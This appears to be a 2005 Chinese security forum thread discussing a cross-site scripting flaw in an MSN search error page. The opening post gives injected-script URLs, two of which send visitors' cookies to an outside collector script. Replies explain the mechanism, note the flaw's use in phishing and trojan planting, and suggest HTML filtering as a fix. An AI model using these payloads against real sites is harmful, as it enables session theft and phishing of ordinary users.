打印

[讨论]MSN上的跨站脚本漏洞

dream2fly

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 593
精华: 41
积分: 4641
阅读权限: 100
性别: 男
在线时间: 478 小时
注册时间: 2004-11-20
最后登录: 2008-11-15

原创技术奖软件研发奖

发短消息
加为好友
当前离线

楼主大中小发表于 2005-8-19 12:17 只看该作者

[讨论]MSN上的跨站脚本漏洞

议题提交：Swords [E.S.T]
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

http://auto.search.msn.com/error_2.asp?name=<script>alert(document.cookie)</script>

http://auto.search.msn.com/error ... ript>window.open("http://wmjie.51.net/swords/cookie.php?"%2Bdocument.cookie)</script>

http://auto.search.msn.com/error ... ;document.location="http://wmjie.51.net/swords/cookie.php?"%2Bdocument.cookie</script>

QQ:838468959

TOP

小船

晶莹剔透§烈日灼然

Rank: 1

帖子: 12
精华: 0
积分: 38
阅读权限: 40
在线时间: 35 小时
注册时间: 2005-8-7
最后登录: 2008-9-1

发短消息
加为好友
当前离线

沙发大中小发表于 2005-8-19 13:28 只看该作者

http://auto.search.msn.com/error ... ript>window.open("http://wmjie.51.net/swords/cookie.php?"%2Bdocument.cookie)</script>

如果你是想知道这个意思.哪么应该是...在访问http://auto.search.msn.com/error_2.asp?name=时打开窗口.而窗口里的内容就是执行一下p://wmjie.51.net/swords/cookie.php这个脚本..并打印出cookice..基本上是这个样子.如果我说错了.请高手指点.

TOP

天下第七

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 876
精华: 10
积分: 4546
阅读权限: 100
性别: 男
来自: 甘肃
在线时间: 195 小时
注册时间: 2004-9-26
最后登录: 2008-6-5

发短消息
加为好友
当前离线

椅子大中小发表于 2005-8-19 13:50 只看该作者

跨站脚本。获取cookies的。。

曾因酒醉鞭名马生怕情多累美人

TOP

kevin1986

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 325
精华: 12
积分: 3936
阅读权限: 100
性别: 男
在线时间: 308 小时
注册时间: 2005-2-5
最后登录: 2008-8-23

发短消息
加为好友
当前离线

板凳大中小发表于 2005-8-19 14:09 只看该作者

name值直接输出到网页中,导致跨站形成

第一个:执行Alert,跳出本地Cookie内容的对话框
第二个:弹出窗口,连接页面是http://wmjie.51.net/swords/cookie.php?"%2Bdocument.cookie
组合后则为
http://wmjie.51.net/swords/cookie.php?"+document.cookie
第三个:当页跳转到指定页面

而Cookie.php的内容类似于保存Cookie到一个文件中..

me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself

TOP

dream2fly

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 593
精华: 41
积分: 4641
阅读权限: 100
性别: 男
在线时间: 478 小时
注册时间: 2004-11-20
最后登录: 2008-11-15

原创技术奖软件研发奖

发短消息
加为好友
当前离线

地板大中小发表于 2005-8-19 16:29 只看该作者

你们说的我都知道，我的意思是说这就是所谓的跨站脚本攻击？？
那msn不惨了？

QQ:838468959

TOP

天下第七

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 876
精华: 10
积分: 4546
阅读权限: 100
性别: 男
来自: 甘肃
在线时间: 195 小时
注册时间: 2004-9-26
最后登录: 2008-6-5

发短消息
加为好友
当前离线

6楼大中小发表于 2005-8-19 17:04 只看该作者

msn很早以前就有跨站漏洞了，，，

曾因酒醉鞭名马生怕情多累美人

TOP

h4k_b4n[BCT]

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 141
精华: 12
积分: 3459
阅读权限: 100
在线时间: 96 小时
注册时间: 2009-5-27
最后登录: 2007-3-19

发短消息
加为好友
当前离线

7楼大中小发表于 2005-8-19 18:13 只看该作者

引用:

下面是引用swords于2005-08-19 16:29发表的:
你们说的我都知道，我的意思是说这就是所谓的跨站脚本攻击？？
那msn不惨了？

这样子模式的跨站~在很多的程序都存在,并不是要注意这个漏洞所针对MSN的危害!
这方面的漏洞应该注意它所带来针对用户的危害!这样子的漏洞在网络钓鱼之中使用是最好的!
因为可以避免URL欺骗被发现!这个很好的构造自己的钓鱼

TOP

kevin1986

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 325
精华: 12
积分: 3936
阅读权限: 100
性别: 男
在线时间: 308 小时
注册时间: 2005-2-5
最后登录: 2008-8-23

发短消息
加为好友
当前离线

8楼大中小发表于 2005-8-19 23:10 只看该作者

CSP其实是一门很好的技术...其实Cookie这些不是最重要的。XSS的漏洞应用的范围是很广的

me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself

TOP

yezhan

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 146
精华: 0
积分: 471
阅读权限: 100
性别: 男
在线时间: 35 小时
注册时间: 2005-6-14
最后登录: 2008-11-21

发短消息
加为好友
当前离线

9楼大中小发表于 2005-8-20 12:15 只看该作者

我想问 ~ 这个该如何在程序上避免？

觉得你够三八吗？觉得你有资格和我挑吗？那就到八里街XX洗头店找老板娘单挑吧活着回来的找我 http://Www.OkHtm.Com ---------------------------------------------------------- 不要看俺了，俺只是来学习的学习你们的三八精神的.

TOP

kevin1986

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 325
精华: 12
积分: 3936
阅读权限: 100
性别: 男
在线时间: 308 小时
注册时间: 2005-2-5
最后登录: 2008-8-23

发短消息
加为好友
当前离线

10楼 大中小发表于 2005-8-20 13:03 只看该作者

过滤HTML标记就可以解决问题

me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself

TOP

幽火

晶莹剔透§烈日灼然

Rank: 1

帖子: 22
精华: 0
积分: 17
阅读权限: 40
在线时间: 9 小时
注册时间: 2005-3-28
最后登录: 2007-12-19

发短消息
加为好友
当前离线

11楼 大中小发表于 2005-8-20 13:18 只看该作者

恩。正象大家说的,是对别的用户造成的隐患,对MSN没什么危害.

TOP

kevin1986

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 325
精华: 12
积分: 3936
阅读权限: 100
性别: 男
在线时间: 308 小时
注册时间: 2005-2-5
最后登录: 2008-8-23

发短消息
加为好友
当前离线

12楼 大中小发表于 2005-8-20 13:46 只看该作者

楼上说的,并不正确.....XSS漏洞的应用范围很广,对于别的用户会造成危害,当然换一个方式也可以对服务器进行危害

me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself

TOP

n3tl04d

晶莹剔透§烈日灼然

Rank: 1

帖子: 108
精华: 0
积分: 277
阅读权限: 40
性别: 男
在线时间: 393 小时
注册时间: 2004-12-16
最后登录: 2008-10-27

发短消息
加为好友
当前离线

13楼 大中小发表于 2005-10-16 23:30 只看该作者

用跨站来挂马应该也可以的！

#n3tl04d@gmail.com:-)

TOP

pazone

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 25
精华: 2
积分: 3037
阅读权限: 100
性别: 男
在线时间: 2 小时
注册时间: 2004-7-30
最后登录: 2008-3-23

发短消息
加为好友
当前离线

14楼 大中小发表于 2005-10-18 10:26 只看该作者

这样几率不太高的 ...
```xss很浪费时间！

是傻X就玩傻X,这年代就是傻X!

TOP

lawfalv

晶莹剔透§烈日灼然

Rank: 1

帖子: 8
精华: 0
积分: 18
阅读权限: 40
在线时间: 0 小时
注册时间: 2005-6-5
最后登录: 2007-6-8

发短消息
加为好友
当前离线

15楼 大中小发表于 2005-11-10 22:56 只看该作者

博客网站很多都有这样的漏洞

TOP

zylcf007

晶莹剔透§烈日灼然

Rank: 1

帖子: 27
精华: 0
积分: 106
阅读权限: 40
在线时间: 38 小时
注册时间: 2005-7-30
最后登录: 2007-6-28

发短消息
加为好友
当前离线

16楼 大中小发表于 2005-11-25 14:25 只看该作者

现在不用获取COOKIE的方法了，好象有别的更好的方法了，这个只是最原始的，希望看到更多关于跨站的应用文章

想飞的小小鸟

TOP

a11yesno

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 125
精华: 6
积分: 3491
阅读权限: 100
在线时间: 81 小时
注册时间: 2005-2-4
最后登录: 2008-11-19

发短消息
加为好友
当前离线

17楼 大中小发表于 2005-11-26 18:34 只看该作者

跨站呢以前2002年的时候可是宝贵的不得了的漏洞动网那时候的跨站还被某些牛人藏着掖着

后来啊随着时代的发展人民技术水平D提高跨站逐渐变成了大众漏洞了

胡扯一番

我没头像了。。。

TOP